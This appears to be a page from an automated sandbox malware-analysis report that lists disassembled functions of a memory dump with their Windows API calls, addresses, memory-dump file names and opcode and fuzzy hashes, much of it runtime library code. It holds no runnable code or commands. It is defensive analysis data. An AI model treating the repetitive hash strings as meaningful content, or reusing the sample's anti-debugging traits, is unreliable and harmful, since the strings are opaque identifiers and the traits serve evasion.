                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharLower
                                                                                                          • String ID:
                                                                                                          • API String ID: 2358735015-0
                                                                                                          • Opcode ID: 12d9df646d8961f903e5bbcd8acc1750f117318e5ae72e7e79f69cca4185c7e0
                                                                                                          • Instruction ID: 1ddfea415faf8c3d19b6936b91c474df6e858837264559b862eab8508f4c34b5
                                                                                                          • Opcode Fuzzy Hash: 12d9df646d8961f903e5bbcd8acc1750f117318e5ae72e7e79f69cca4185c7e0
                                                                                                          • Instruction Fuzzy Hash: 5B411C76600209AFCB11DF64C8819AE77F8FF5A354B14552EE916EF251EB30EE04CB60
                                                                                                          Function 00E55F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsThemeActive.UXTHEME ref: 00E55FEF
                                                                                                            • Part of subcall function 00E6359C: __lock.LIBCMT ref: 00E635A2
                                                                                                            • Part of subcall function 00E6359C: DecodePointer.KERNEL32(00000001,?,00E56004,00E98892), ref: 00E635AE
                                                                                                            • Part of subcall function 00E6359C: EncodePointer.KERNEL32(?,?,00E56004,00E98892), ref: 00E635B9
                                                                                                            • Part of subcall function 00E55F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E55F18
                                                                                                            • Part of subcall function 00E55F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E55F2D
                                                                                                            • Part of subcall function 00E55240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E5526C
                                                                                                            • Part of subcall function 00E55240: IsDebuggerPresent.KERNEL32 ref: 00E5527E
                                                                                                            • Part of subcall function 00E55240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E552E6
                                                                                                            • Part of subcall function 00E55240: SetCurrentDirectoryW.KERNEL32(?), ref: 00E55366
                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00E5602F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1438897964-0
                                                                                                          • Opcode ID: 96f59e5ace55f5307a0442becccd12dd67c13371071c3a2c050b35ef172c5ab8
                                                                                                          • Instruction ID: a9ee02d150dcb7af5fbff3430fe3f417eabb4f761b6dc75c6aba0c1d1ab6c276
                                                                                                          • Opcode Fuzzy Hash: 96f59e5ace55f5307a0442becccd12dd67c13371071c3a2c050b35ef172c5ab8
                                                                                                          • Instruction Fuzzy Hash: 4211AC719083059BC320EF69EC45A4ABBE8FF99350F40491AF484A72B1DB70A548CF92
                                                                                                          Function 00E542F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00E53E72,?,?,?,00000000), ref: 00E54327
                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00E53E72,?,?,?,00000000), ref: 00E90717
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 1237c21336d4c0171e6fd2754dcd0bc4c5fba621ab5be5d924c8a7bf577310da
                                                                                                          • Instruction ID: 46887759918fdec3d9e64bcea4cfa4cb22d8143953733f0316c18083d0aad99b
                                                                                                          • Opcode Fuzzy Hash: 1237c21336d4c0171e6fd2754dcd0bc4c5fba621ab5be5d924c8a7bf577310da
                                                                                                          • Instruction Fuzzy Hash: D00180B0245209BEF7641E248C8AFA67A9CEB0176DF50C619BEE47A1E0C6B15C89CB14
                                                                                                          Function 00E6581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock_file_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 26237723-0
                                                                                                          • Opcode ID: ed4880d234f1724d1d559a27eb3eca096c4716b7ce430aae14da8508f8017995
                                                                                                          • Instruction ID: 22e3a657a06d5a3ad3e1f1ea3326a1f9b3ef40a3eef21c5ddf1d5037a321e82e
                                                                                                          • Opcode Fuzzy Hash: ed4880d234f1724d1d559a27eb3eca096c4716b7ce430aae14da8508f8017995
                                                                                                          • Instruction Fuzzy Hash: DE018472980748EBCF11AF69FD0589E7BA1AF903E0F145226B9243B1A1D7318A21DF91
                                                                                                          Function 00E655C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E68D58: __getptd_noexit.LIBCMT ref: 00E68D58
                                                                                                          • __lock_file.LIBCMT ref: 00E6560B
                                                                                                            • Part of subcall function 00E66E3E: __lock.LIBCMT ref: 00E66E61
                                                                                                          • __fclose_nolock.LIBCMT ref: 00E65616
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2800547568-0
                                                                                                          • Opcode ID: 724c1307a424aa64d7ec785b38004344e942ca495f8938faddac9eaa56cbd202
                                                                                                          • Instruction ID: 444c61280194598f69d7617f16592679c7b517e3e533ed89675316a2f84060c6
                                                                                                          • Opcode Fuzzy Hash: 724c1307a424aa64d7ec785b38004344e942ca495f8938faddac9eaa56cbd202
                                                                                                          • Instruction Fuzzy Hash: 1EF09072A81B099BD7106B65A90676E6BE16F503F4F21A209A425BB1C1CB7C4A019F51
                                                                                                          Function 00E4E36D Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SleepTimetime
                                                                                                          • String ID:
                                                                                                          • API String ID: 346578373-0
                                                                                                          • Opcode ID: 1782603d621ae3f9005256ba7ee195b285d1db8bb647e7c778c59b8079d20b40
                                                                                                          • Instruction ID: e28ffb7457a1361b3318257766bd38b8f2af3597c55ccfaed9a3d4fd19e0cd9e
                                                                                                          • Opcode Fuzzy Hash: 1782603d621ae3f9005256ba7ee195b285d1db8bb647e7c778c59b8079d20b40
                                                                                                          • Instruction Fuzzy Hash: 6CF012352406129FD350EF69E455BA6B7E4FF45750F00542AF42AE7352DB70AC44CB91
                                                                                                          Function 00E65E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __lock_file.LIBCMT ref: 00E65EB4
                                                                                                          • __ftell_nolock.LIBCMT ref: 00E65EBF
                                                                                                            • Part of subcall function 00E68D58: __getptd_noexit.LIBCMT ref: 00E68D58
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2999321469-0
                                                                                                          • Opcode ID: eb2828239d973a2e6409cf084d30a5ce5a2905c1e4a8520c16bbfa65b33fff2c
                                                                                                          • Instruction ID: dfa9c1f40c77e145003ca1d2379571dda7b21645ef3fec0c80956f064028ecce
                                                                                                          • Opcode Fuzzy Hash: eb2828239d973a2e6409cf084d30a5ce5a2905c1e4a8520c16bbfa65b33fff2c
                                                                                                          • Instruction Fuzzy Hash: 02F0EC32AD16199BDB00BB74AA0375E76D06F113B1F217306B020BB1D2CF784F019B55
                                                                                                          Function 00E55AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00E55AEF
                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E55B1F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell__memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 928536360-0
                                                                                                          • Opcode ID: 4c0030d57ff10727dc10b6d0b82a199c21f408d7b9da02b4a08f742a4a55b716
                                                                                                          • Instruction ID: a17b8039f9e0ba2aa0b3f075e2e70e70f79f32b625225dd272d2eada483ed7ab
                                                                                                          • Opcode Fuzzy Hash: 4c0030d57ff10727dc10b6d0b82a199c21f408d7b9da02b4a08f742a4a55b716
                                                                                                          • Instruction Fuzzy Hash: 93F0A771C0930C9FD7D29B64DC49795B7BCA70030CF0001EAAA48A6292D7711B88CF51
                                                                                                          Function 00EBC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString$__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 207118244-0
                                                                                                          • Opcode ID: d3ebb3a062f456425e5ed489281ed12b9a64df221d4ab002b26700508c8f7479
                                                                                                          • Instruction ID: 85fcae31c8b6d82291aded6d28afab0f5e849c835db572da1981ed737dd9ebdc
                                                                                                          • Opcode Fuzzy Hash: d3ebb3a062f456425e5ed489281ed12b9a64df221d4ab002b26700508c8f7479
                                                                                                          • Instruction Fuzzy Hash: 73B15C34A0410ADFCB14DFA4D851DEEB7B5FF48714F20A05AF915BB291EB70AA45CB90
                                                                                                          Function 00E4A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 98adbf28a40f5d0034c1903875cd77dbebdb399a9fea0f49e0ac0170b9371455
                                                                                                          • Instruction ID: ffcbf291b2340ed36a58be33a8e0038508836e158b3524921e48cc75835e33cf
                                                                                                          • Opcode Fuzzy Hash: 98adbf28a40f5d0034c1903875cd77dbebdb399a9fea0f49e0ac0170b9371455
                                                                                                          • Instruction Fuzzy Hash: F061E170640606DFDB14DF50E881ABAB7E5FF88324F19907DEA1AAB281D774ED40CB51
                                                                                                          Function 00E4D679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 20ab37a047499bcb88f0b08502db4e7e0003bbfc9ea4e9c8bd17f170b67751e0
                                                                                                          • Instruction ID: 5fe840d4486d64cac8eae899c98a1706467d42e89ecd3786e15ffefe74f05130
                                                                                                          • Opcode Fuzzy Hash: 20ab37a047499bcb88f0b08502db4e7e0003bbfc9ea4e9c8bd17f170b67751e0
                                                                                                          • Instruction Fuzzy Hash: A951BC35704604ABCB14EB68C995FAE73E6AF45354F14A4A8F84ABB392CB30ED05CB50
                                                                                                          Function 00E5343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                                                          • Instruction ID: ebe2f7f1d15f22794d3527a136a8684ce793946bd2c038c1f8a08324929be2d0
                                                                                                          • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                                                          • Instruction Fuzzy Hash: 8731C175204612EFC725DF28D480A62F7E0FF08391B14E969ED9AAB751E730EC85CB90
                                                                                                          Function 00E5410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00E541B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: bd2dca6a3fd72b585ee3d8725cae635526eaf2652173d7d2f47577ab564ebdd0
                                                                                                          • Instruction ID: c66b641df584edf307a59ab999bb8a4e0886b2fa77ec0b31570a9feed497e6cd
                                                                                                          • Opcode Fuzzy Hash: bd2dca6a3fd72b585ee3d8725cae635526eaf2652173d7d2f47577ab564ebdd0
                                                                                                          • Instruction Fuzzy Hash: 30318DB1A01A16AFCB18CF2DC980A9DB7B1FF54319F149A19EC15A3750D770BDE88B90
                                                                                                          Function 00E7E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: 76efd6d4542d4f648188bfde3fdce1ab4543cdc4d171f4d335d3518e73e92496
                                                                                                          • Instruction ID: 8a39b8fbade34bc3b9fb0062d3105e9c89731b7c9730dbeb558b10bfa0f12d3a
                                                                                                          • Opcode Fuzzy Hash: 76efd6d4542d4f648188bfde3fdce1ab4543cdc4d171f4d335d3518e73e92496
                                                                                                          • Instruction Fuzzy Hash: FC411974508351DFDB24DF14D584B1ABBE1BF85308F0999ACE889AB362C371EC85CB92
                                                                                                          Function 00E549C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E54B29: FreeLibrary.KERNEL32(00000000,?), ref: 00E54B63
                                                                                                            • Part of subcall function 00E6547B: __wfsopen.LIBCMT ref: 00E65486
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E527AF,?,00000001), ref: 00E549F4
                                                                                                            • Part of subcall function 00E54ADE: FreeLibrary.KERNEL32(00000000), ref: 00E54B18
                                                                                                            • Part of subcall function 00E548B0: _memmove.LIBCMT ref: 00E548FA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1396898556-0
                                                                                                          • Opcode ID: ed8736f6bbd0307e0a877942c8334dc5b65363a0087eb5203332647f3c2c2589
                                                                                                          • Instruction ID: df92140b0136eee7d90cf7469271c9995f8700f37d49c4fb0fbf6d46b9b6299d
                                                                                                          • Opcode Fuzzy Hash: ed8736f6bbd0307e0a877942c8334dc5b65363a0087eb5203332647f3c2c2589
                                                                                                          • Instruction Fuzzy Hash: 8A110472650305ABCB14FB60CC02FAE77E99F4070AF105829F841B61C3FA709A48A794
                                                                                                          Function 00E7E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: 7be9f48a248b825ee7b5642c2f3d1590e22bae9f310d288f2bd35455288756f1
                                                                                                          • Instruction ID: 65d10b04c680e3d853ee4e95ffff9933eab2a69dce34d56e4c47c86ea387c969
                                                                                                          • Opcode Fuzzy Hash: 7be9f48a248b825ee7b5642c2f3d1590e22bae9f310d288f2bd35455288756f1
                                                                                                          • Instruction Fuzzy Hash: 0721F474508341DFDB24DF14D544B1ABBE1BF89308F0999ACF88A67362D731E849DB92
                                                                                                          Function 00E54220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00E53CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E54276
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
